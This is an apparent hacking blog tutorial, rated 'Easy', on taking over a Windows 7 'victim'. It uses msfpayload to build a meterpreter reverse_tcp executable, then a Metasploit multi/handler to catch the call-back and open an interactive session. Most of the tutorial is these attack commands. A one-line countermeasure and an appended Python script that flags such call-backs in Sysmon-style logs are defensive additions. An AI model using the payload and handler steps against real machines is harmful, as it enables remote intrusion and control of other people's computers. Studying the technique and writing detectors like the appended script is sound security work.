
Level : Easy

As I have already written in my previous post about how to add a user with administrator
rights (you can read the tips and tricks here), today I will write a simple tutorial on creating an
exploit for Windows 7 and all other Windows versions.

Everyone loves the simple way, isn't it? That's why in my previous tutorial and in today's
tutorial I keep everything simple and easy to use.

In today's tutorial we will learn how to create a simple exploit (easy to create and easy to
implement) and how to connect to a Windows 7 victim that has already executed our simple
exploit. Simple, isn't it?

Okay let’s start the tutorial.

Requirements :
1. Metasploit Framework
2. Windows XP and earlier Windows versions (I use Windows 7 SP1)

Step by Step :
FYI, in this tutorial I use Backtrack 5 R2 with Metasploit Framework 4.2.0, and my IP address is 192.168.8.91.

1. Open your terminal console and type the following command :

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.91 X > Desktop/v4L.exe

The above command will create a Windows executable file named "v4L.exe" and save it on your desktop.

2. Now you need to copy your newly created v4L.exe to your Windows 7 system. If you don't know how to share your Backtrack 5 folder, you can
view the tutorial on how to share a folder in your Backtrack (view tutorial here).

3. The next step is to create a handler to handle the connection that comes to our Backtrack system from the simple exploit we created
before. Open your Metasploit console, see the picture, and type the following commands :
Information :

use exploit/multi/handler --> use the metasploit handler

set payload windows/meterpreter/reverse_tcp --> we use reverse_tcp (see step 1)

set lhost 192.168.8.91 --> set our local IP address that will catch the reverse connection

exploit -j -z --> start the handler

4. Now you can try to execute the simple exploit we already copied to Windows 7 and see whether our handler receives something or not. Below is
the screenshot of my handler when Windows 7 executed the simple exploit :

I use sessions -l to list every session that is already open there.

5. To interact with the available session, you can use sessions -i <session_id>. From there you can run other commands as you want.

Yes, we're inside the Windows 7 now.

Countermeasures :
1. Install a 3rd-party firewall and antivirus that are always kept updated.
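As an added, defender-side example that is not part of the original tutorial: a small Python script that flags the kind of outbound connection the executable from step 1 makes when it calls back to the handler. The input is a few constructed Sysmon-style network-connection records (the field names follow Sysmon Event ID 3; the log line format, the list of user-writable directories, the set of expected ports and the two-indicator threshold are all assumptions for this example, not Sysmon or Metasploit defaults). The destination port 4444 in the sample record is Metasploit's default LPORT for reverse_tcp, which the msfpayload command above does not override.

```python
"""
Added example (not part of the original tutorial): flag outbound connections
that look like a reverse-shell call-back, such as the one v4L.exe makes to the
Metasploit handler.  All log lines below are constructed for this example.
"""
import ipaddress
import re
from dataclasses import dataclass, field

# Directories that installed, legitimate software rarely runs from.
# Assumption for this example; tune for your environment.
USER_WRITABLE_DIRS = (
    "\\desktop\\",
    "\\downloads\\",
    "\\appdata\\local\\temp\\",
    "\\users\\public\\",
)

# Ports that desktop software on this (assumed) network normally talks to.
EXPECTED_PORTS = {53, 80, 135, 139, 443, 445, 3389}

# Constructed Sysmon-style Event ID 3 records, one per line.
SAMPLE_EVENTS = [
    # the tutorial's payload calling back to the handler on the default LPORT 4444
    "Image: C:\\Users\\victim\\Desktop\\v4L.exe|DestinationIp: 192.168.8.91|DestinationPort: 4444|Initiated: true",
    # benign browser traffic
    "Image: C:\\Program Files\\Internet Explorer\\iexplore.exe|DestinationIp: 93.184.216.34|DestinationPort: 443|Initiated: true",
    # benign DNS lookup from a system process
    "Image: C:\\Windows\\System32\\svchost.exe|DestinationIp: 192.168.8.1|DestinationPort: 53|Initiated: true",
    # an installer on the Desktop fetching over HTTPS: one indicator only, not flagged
    "Image: C:\\Users\\victim\\Desktop\\setup.exe|DestinationIp: 93.184.216.34|DestinationPort: 443|Initiated: true",
    # inbound connection to a program in Downloads (not initiated by it)
    "Image: C:\\Users\\victim\\Downloads\\tool.exe|DestinationIp: 192.168.8.50|DestinationPort: 8080|Initiated: false",
]

FIELD_RE = re.compile(r"(\w+): ([^|]*)")


@dataclass
class NetEvent:
    image: str
    dst_ip: str
    dst_port: int
    initiated: bool
    reasons: list = field(default_factory=list)


def parse_event(line: str) -> NetEvent:
    """Turn one 'Key: value|Key: value' record into a NetEvent."""
    fields = dict(FIELD_RE.findall(line))
    return NetEvent(
        image=fields["Image"],
        dst_ip=fields["DestinationIp"],
        dst_port=int(fields["DestinationPort"]),
        initiated=fields["Initiated"].strip().lower() == "true",
    )


def score_event(ev: NetEvent) -> list:
    """Return the indicators that make this connection look like a call-back."""
    reasons = []
    if not ev.initiated:
        return reasons  # a call-back is always initiated by the local process
    if any(d in ev.image.lower() for d in USER_WRITABLE_DIRS):
        reasons.append("binary runs from a user-writable directory")
    if ev.dst_port not in EXPECTED_PORTS:
        reasons.append(f"unusual destination port {ev.dst_port}")
    if ipaddress.ip_address(ev.dst_ip).is_private:
        reasons.append("destination is an internal host")
    return reasons


def find_suspicious(lines, min_reasons: int = 2) -> list:
    """Parse every record and keep those with at least min_reasons indicators."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        ev.reasons = score_event(ev)
        if len(ev.reasons) >= min_reasons:
            hits.append(ev)
    return hits


if __name__ == "__main__":
    for ev in find_suspicious(SAMPLE_EVENTS):
        print(f"SUSPICIOUS {ev.image} -> {ev.dst_ip}:{ev.dst_port}")
        for r in ev.reasons:
            print(f"    - {r}")
```

A single indicator on its own is too noisy (the constructed setup.exe on the Desktop talking HTTPS is normal), so the script requires two before it reports a connection; the v4L.exe record trips all three. In practice the same logic sits on real Sysmon or host-firewall logs, and the firewall from countermeasure 1 can block the outbound connection outright when the rule set only permits known applications.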

Hope it’s useful

FYI : There's still another tutorial I will post later about Hacking Remote Desktop.

